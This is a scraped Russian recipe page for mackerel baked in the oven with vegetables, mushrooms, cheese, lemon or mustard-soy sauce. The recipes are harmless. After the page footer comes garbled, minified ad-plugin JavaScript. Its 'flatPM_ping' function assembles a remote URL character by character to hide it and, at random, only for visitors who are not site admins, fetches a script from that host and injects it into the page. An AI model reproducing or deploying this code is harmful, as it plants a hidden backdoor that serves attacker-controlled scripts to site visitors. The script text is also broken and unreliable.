Скумбрия в духовке с овощами рецепт

Скумбрия запеченная в духовке с овощами

  • Нам понадобится:
  • Скумбрия — 1 шт.
  • Морковь — 1 шт.
  • Лук — 2 шт.
  • Масло подсолнечное — 2 ст.л.
  • Перец душистый горошком — 8-10 шт.
  • Соль — 0,5 ч.л.
  • Лимон для подачи

Существует много рецептов приготовления свежемороженой скумбрии, по которым рыбка получается просто восхитительно вкусной. Предлагаем один из вариантов – запеченную скумбрию в фольге с морковью и луком.

Рыба получается превосходной, нежной, сочной и очень ароматной. Удивите своих домашних таким несложным, но вкусным блюдом.

Чтобы приготовить запеченную скумбрию в фольге в духовке, нужно минимум ингредиентов: скумбрия, морковь, лук, лимон и специи. Запекается скумбрия в фольге, это обеспечивает равномерное приготовление снаружи и внутри.

Как приготовить скумбрию запеченную в духовке с овощами

Пошаговое описание рецепта

1. Подготовить все необходимые ингредиенты. Если вы купили замороженную скумбрию, ее необходимо разморозить естественным способом. Оставьте ее при комнатной температуре на 1,5-2 часа. Главный секрет приготовления скумбрии в духовке заключается в том, что полностью размораживать рыбу не стоит, можно начинать ее готовить, когда она остается еще немного подмороженной, так будет легче разделать рыбу. Удалить внутренности, плавники и хвост. Если Вы хотите оставить голову у рыбы, то необходимо вырезать жабры. Удалить темную пленку.

2. Тщательно промыть под проточной водой скумбрию и обсушить бумажным полотенцем. Ни в коем случае нельзя размораживать скумбрию в микроволновке.

3. Душистый черный перец горошком измельчить любым удобным для Вас способом. Я это сделаю с помощью пекарской бумаги и кухонного молотка. Смешать перец и соль.

4. Натереть перцем и солью скумбрию снаружи и внутри. Оставить рыбу мариноваться.

5. Займемся овощами. Морковь натереть на мелкой терке.

6. Лук порезать небольшими кусочками, можно четверть кольцами. В разогретую сковородку залить 2 ст.л. растительного масла. Добавить лук, готовить до прозрачности, буквально пару минут. Добавить морковь и готовить до мягкости обоих ингредиентов. Нафаршировать скумбрию луком и морковью. Завернуть рыбу в фольгу брюхом вверх. Запекать в разогретой духовке примерно 30-35 минут при температуре 180 градусов. За 5-10 минут до конца приготовления фольгу развернуть, чтобы на поверхности рыбки образовалась аппетитная корочка.

7. Полить сверху скумбрию соком от половины лимона. Подавать рыбу в горячем или в холодном виде с рубленой зеленью и дольками лимона. Приятного аппетита.

Скумбрия в духовке с овощами — самый вкусный рецепт

Любителям рыбных блюд хочу предложить самый вкусный рецепт — скумбрия в духовке с овощами. Не знаю, но мне кажется мало найдётся людей, которые не любят этот вид рыбы. Она пользуется большой популярностью в солёном, копчёном виде, но также из неё можно приготовить много других разнообразных и интересных блюд. К примеру, на сайте моей подруги Таисии есть очень интересные рецепты: https://hozyajkadoma.ru/skumbriya-zapechennaya-v-duhovke-prostye-recepty.html .

Скумбрия не считается диетическим продуктом, но её полезно включать в свой рацион, благодаря входящим в состав полезным веществам. Её мясо легко переваривается и усваивается организмом. Рекомендовано для детского питания, людям преклонного возраста, неоценимую помощь окажет людям умственного труда, беременным и кормящим женщинам.

Привлекательна она не только полезными свойствами. У неё вкусное, нежное, мягкое мясо. Гладкая кожа не требует чистки, практически не содержит костей, кроме позвоночника. Не удивительно, что повара широко используют её в кулинарии и она прекрасно сочетается с картошкой, рисом, макаронными изделиями. Хорошим дополнением при приготовлении рыбных блюд могут быть цитрусовые, зелень, сыр, сметана, майонез. Я предлагаю запечь её с овощами, грибами и сыром.

Скумбрия в духовке с овощами, сыром и грибами

Интересен данный рецепт тем, что разделывать мы её будем не со стороны брюшка, как обычно разделывают рыбу, а со стороны спины. У скумбрии главные жировые отложения находятся в брюшной полости и, чтобы жирок остался, а не вытек через разрез, мы и будет потрошить её со спины.

Состав продуктов:

  • тушка скумбрии — 1 шт.
  • репчатый лук — 1 шт.
  • морковь — 1 шт.
  • болгарский перец — 1 шт.
  • грибы — 150 гр.
  • сыр твёрдых сортов — 50 гр.
  • сметана — 1 ст. л.
  • чеснок — 1 зубчик
  • соль, молотый перец по вкусу
  • растительное масло

Как разделать скумбрию для запекания в духовке

Если вы купили замороженную скумбрию, то размораживать её надо естественным путём, положив на нижнюю полку холодильника. Но не размораживайте её до конца, так удобнее будет её разделывать.

Если надо разморозить быстро, то можно залить рыбу водой, но она должна быть подсоленной, от простой воды мясо рыбы раскисает.

1. Положить тушку брюшком вниз, сделать со стороны спины поперечные надрезы около головы и хвоста, но не до конца. Голову и хвост отрезать не надо.

2. Затем острым ножом сделать довольно глубокий разрез вдоль спины.

3. Ножницами в двух местах у хвоста и головы отделить хребет и вынуть его из тушки. А также аккуратно вынуть внутренности и жабры, хорошо вычистить полость рыбы.

Не используйте воду, чтобы полностью очистить тушку от остатков внутренностей и чёрной плёнки. Лучше это сделать с помощью бумажного полотенца.

4. Зубок чеснока пропустить через пресс, положить в миску, добавить 2 ч. л. растительного масла и 1 ч. л. соли — перемешать и обмазать рыбу внутри и снаружи. Форму для запекания смазать растительным маслом и положить разделанную тушку скумбрии.

Готовим начинку из овощей и грибов

1. Приготовим начинку для фарширования. Морковь натереть на крупной тёрке, репчатый лук мелко нарезать, грибы и болгарский перец нарезать кусочками.

2. В сковороду налить растительное масло, прогреть его, положить лук, обжарить до прозрачности. Затем добавить морковь, обжарить вместе до мягкости корнеплода.

3. Положить нарезанные грибы и потушить вместе 5 минут.

Грибы можно взять любые, если они у вас замороженные, то предварительно их можно не размораживать, а сразу положить в сковороду к овощам.

4. Добавить болгарский перец, перемешать и обжарить всё вместе буквально пару минут. Посолить, поперчить, положить сметану, хорошо перемешать и убрать с огня.

5. Плотно уложить начинку в тушку скумбрии.

6. Сверху присыпать натёртым на крупной тёрке сыром и поставить в духовку.

Скумбрия запечённая в духовке с овощами готова

При температуре 180 градусов запекать рыбу 30−35 минут. Когда образуется золотистая сырная корочка, рыбу вынуть из духовки и переложить на блюдо.

Гарнир для этого рецепта отдельно готовить нет необходимости, так как начинка из овощей с грибами под сырной корочкой прекрасно его заменит. Но при желании можно в форму для запекания вокруг рыбы выложить картофель. Нарезать его кусочками, посолить, присыпать сладкой паприкой, сбрызнуть растительным маслом, перемешать и выложить дольки картофеля вокруг рыбы.

Скумбрия в духовке с овощами — это на самом деле удачный рецепт. Мясо у рыбы получается нежное, начинка сочная и всё это делает блюдо необыкновенно вкусным. Если вы ещё не готовили эту рыбу таким способом, то обязательно возьмите рецепт на заметку.

Скумбрия запеченная в духовке с овощами, простые и вкусные рецепты

Скумбрия запеченная в духовке, по своей полезности и вкусности, затмит любое блюдо на столе, в том числе и праздничном. Технология приготовления скумбрии в духовке, не сложная, ее осилит любой, кто любит возиться на кухне.

Скумбрия запеченная, может быть: целая фаршированная овощами; порезанная кусочками и запеченная вперемежку с овощами; а может целая- с дольками лимона в горчичном соусе. Она может быть запеченная в фольге и без нее.

Сегодня приготовим следующие блюда из рыбы скумбрии:

Очень вкусные и легкие в приготовлении рецепты блюд из рыбы можно посмотреть здесь.

Скумбрия, запеченная в духовке с овощами

  • 3 шт рыбы скумбрия
  • 3-4 шт помидор
  • 1-2 шт лука репчатого
  • 1/2 шт лимона
  • соль, перец по вкусу
  • растительное масло

1.Рыбу очищаем от потрохов и черной пленки, срезаем плавники,

отрезаем голову и хвост. Помоем и обсушим бумажным полотенцем.

2. Скумбрию нарезаем кусочками, шириной 1,5 – 2 см солим и перчим.

3. Кольцами нарезаем лук и помидоры.

4. На смазанную маслом форму, выкладываем по кругу или рядочками, кусочек рыбы кружочек лука помидор, и так повторяем, пока хватит рыбы.

5. Поливаем рыбу, лимонным соком, а сверху смазываем растительным маслом.

6. Выпекаем 30 минут, в разогретой духовке до 200 градусов. Подается к столу с зеленью и соусом.

Скумбрия запеченная с лимоном в фольге

  • 3 шт скумбрий
  • 1 лимон
  • 3-4 шт веточек укропа
  • помидоры черри для украшения по усмотрению)
  • смесь перцев, соль по вкусу
  • смесь специй для рыбы
  • 2 ст.л. масла подсолнечного

1.Скумбрию подготовить к запеканию, как в предыдущем рецепте. Главное не оставить черную пленку, чтобы не горчила.

2. Лимон разрезаем пополам и пластинками.

3. Соль смешиваем с перцем и этой смесью натираем, внутри тушки. Снаружи – натираем смесью специй для рыбы.

4. На тушках делаем поперечные надрезы, не до конца, шириной 2 см, и в них вставляем пластинки лимона.

5. В форму застилаем фольгу, матовой стороной вниз, накрест и заливаем 1-2 ст.л. растительного масла. Кладем скумбрию, заворачиваем края фольги, чтобы не вытекал сок.

6. Процесс запекания длится 30 минут при 180 градусах, не забываем духовку разогревать заранее. Затем, развернув фольгу, еще 15 минут выдерживаем в духовке, для зарумянивания.

Подаем на блюде, украсив помидорами черри и ветками укропа.

Скумбрия запеченная с картофелем, баклажанами и перцем

  • 1 шт (540 г) скумбрии
  • 2 шт картофеля, большого размера
  • 3 шт помидор
  • 1 головка лука репчатого
  • 1 шт перца сладкого болгарского
  • 1 шт баклажан
  • 0,5 ч.л. перца черного молотого
  • 1 ч.л. итальянских сухих трав
  • соль по вкусу
  • 1 ст.л. сока лимона
  • масло растительное

1.Подготовленную скумбрию нарезаем кусочками, 2 см шириной, посолим и поперчим сверху и внутри.

2. Все овощи моем и нарезаем кружочками.

3. Форму смазываем подсолнечным маслом. Дно формы, выложить картофелем, посолить ,поперчить и посыпать итальянскими травами.

Картофель закрываем слоем скумбрии, между ее кусочками, кладем поочередно, лук, помидор и так пока не закончатся кусочки рыбы.

4. На свободном, от рыбы, месте на картофель кладем баклажаны, помидоры, сладкий перец, все солим и перчим. Рыбу нужно полить лимонным соком и смазать постным маслом.

5. Запекать в духовке 40 минут, температура 190 градусов.

Скумбрия в соево – горчичном соусе, запеченная в духовке

  • 2 шт скумбрий (700-800 г)
  • 1 шт репчатого лука
  • 2 ст.л. майонеза (сметаны)
  • 3 ст.л. соевого соуса
  • 1 ст.л. горчицы
  • 1 ч.л. кориандра
  • соль, перец по вкусу

1.Рыбу подготовить к запеканию, нарезать на порционные кусочки, присолить.

2. Лук нарезаем полукольцами.

3. Готовим маринад: в миске смешиваем соевый соус, майонез, горчицу с зернами, кориандр и черный перец (по вкусу). Все тщательно перемешать.

4. Рыбу поливаем маринадом, перемешиваем, накрыв крышкой, настаиваем на 30-40 минут.

5. В смазанную форму, выкладываем лук, на него кусочки рыбы и смазываем их маринадом (весь маринад не кладем). В разогретой до 180 градусов духовке выпекаем 25 минут.

Скумбрия в духовке

Скумбрия “Золотая рыбка”

Я не очень большой любитель рыбы, но эта рыбка привела меня в полный восторг! Я чуть язык не проглотила, и вторая половинка с огромным удовольствием наслаждался “золотой рыбкой”. Подробности рецепта ниже, заходите, не пожалеете! На конкурс “Подари мне этот вечер”.

Фаршированная скумбрия без костей

Очень нежное, сочное мясо скумбрии, в меру жирненькое, ароматное и с великолепной начинкой из грибов, сыра и яйца, запеченная под сырной корочкой. В нашей рыбке нет не одной косточки, также и шкурки, просто вооружаемся вилкой, огромным аппетитом и наслаждаемся наивкуснейшим ужином. Можно даже без салфеток, они понадобятся, только пока наша рыбка готовится, слюнки подобрать )))

Скумбрия в духовке

Рецептом этой вкуснейшей рыбки поделилась со мной старшая сестрёнка, за что ей огромное спасибо! Надеюсь, что понравится и Вам.

Скумбрия, запеченная в фольге

Рецепт из книги “Рецепты вкусной и здоровой жизни (Книга гастронома)”. В первый раз делала начинку для рыбы из сыра и яиц. К моему удивлению, начинка получилась очень нежная, рыбка сочная. Я ела, поливая, лимонным соком (так как, скумбрия жирноватая попалась), а муж так всe съел. На гарнир сюда очень хорошо пойдeт салат из свежих овощей. Самое главное, понравилось всем домашним, этот рецепт теперь у меня “не разовый”, буду делать ещe.

Скумбрия запеченная

Очень простой рецепт, не требует много времени, хорош в горячем и в холодном виде, напоминает рыбу горячего копчения, съедается всегда очень быстро, на вкус – просто сказка.

Запеченная скумбрия “Краски осени”

Давно хотела поделиться этим рецептом, и все никак. Я рыбу вообще люблю, любую, приготовленную любым способом, и на пару, и отварную. Этот рецепт один из фаворитов. Лично для меня он состоит только из одних плюсов. Быстро, просто, недорого, и на праздничный стол поставить не стыдно. Очень вкусна овощная подушка, да и рыба великолепная. Налетайте! Приготовить подобным образом можно любую рыбу.

Скумбрия “Рыбка золотая”

Скумбрия ( макрель) – чуть ли не единственная рыба, содержащая максимальное количество омега 3 жирные кислоты, которые наш организм не синтезирует, живущая и выловленная в диких водах. А один из самых древних способов приготовления рыбы – запечь. Угощайтесь.

Скумбрия плаки по-критски

Вообще, именно скумбрию на Крите не встречала, другую рыбу плаки ели. Но скумбрия такая вкусная рыба, а приготовленная таким образом – просто божественное лакомство. Рецепт взят из книги Мирсини Ламбраки. Готовлю так раз -дцатый. Вкусно в горячем виде, но и в холодном меня лично за уши не оттащить. Я даже не знаю, как описать вкус этого блюда. Что-то среднее между рыбой под маринадом и скумбрией горячего копчения! Это очень вкусно! Попробуйте, уверена вам понравится! Рыба, конечно, может быть любая, желательно малокостная. Не хотите отведать?

Скумбрия «Сливочная неженка»

У меня опять праздник, рыбный день )) Нежнейшая, сочная и ароматная скумбрия, запеченная в сливках, фаршированная овощами и грибами, под необыкновенно вкусной, румяной сырной корочкой. Никаких изысков, лишних ингредиентов, всего в меру и необыкновенно вкусно. Рыбка просто тает во рту, овощи дополняют всю гамму вкусов, а хорошее вино великолепно дополнит картину тихого семейного ужина.

Запеченная скумбрия в духовке

Очень люблю запеченную скумбрию по этому рецепту. Благодаря соусу скумбрия получается очень вкусной, сочной, ароматной и аппетитной. Для приготовления нужно совсем немного времени. Однозначно рекомендую!

Скумбрия в духовке. Скумбрия в духовке – простое в приготовлении, универсальное, полезное и вкусное блюдо.

Блюдо подойдет как для обычного семейного обеда, так и для праздничного ужина и красивого застолья. Основа создания блюда – подготовка рыбы для запекания и само запекание рыбы в духовке, которое займет не более получаса. На подготовку рыбы у хозяйки уйдет совсем немного времени. Далее духовка все сделает сама.

Рекомендуется рыбу запекать не в открытом виде на противне или в форме в духовом шкафу, но завернутой в фольгу или сложенной в рукав для запекания продуктов. При таком методе приготовления, рыба останется сочной, маслянистой, не будет сухой, также сохранится аромат специй, которые будут использованы в маринаде для рыбы.

Скумбрию в духовке делают цельной, либо нарезают ее на куски. И саму тушку рыбы, и филе рыбы следует посыпать специями для рыбы, рекомендуемыми отдельным кулинарным рецептом. Желательно рыбу сбрызнуть соком лимона, приправить рубленой зеленью, или сложить веточки зелени вместе с тушкой рыбы для запекания.

Хорошо гармонируют со скумбрией в этом блюде такие приправы, как черный перец, молотый или горошком, горчичные зерна, белый перец, лавровый лист. Из овощей рыба при запекании хорошо сочетается с чесноком, луком, морковью, картофелем, томатами, маслинами и оливками.

Рыбу подготавливают, заворачивают вместе со специями или крупно нарезанными овощами в фольгу. Выкладывают на противень или в форму с высокими бортиками. Ставят в разогретую духовку на полчаса. Далее рыбу можно украсить кружочками лимона, либо свежего огурца, нарезанного тонко.

К такой рыбе рекомендуется подать в качестве гарнира отварной рис, отварной картофель клубнями, салат из свежих овощей.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};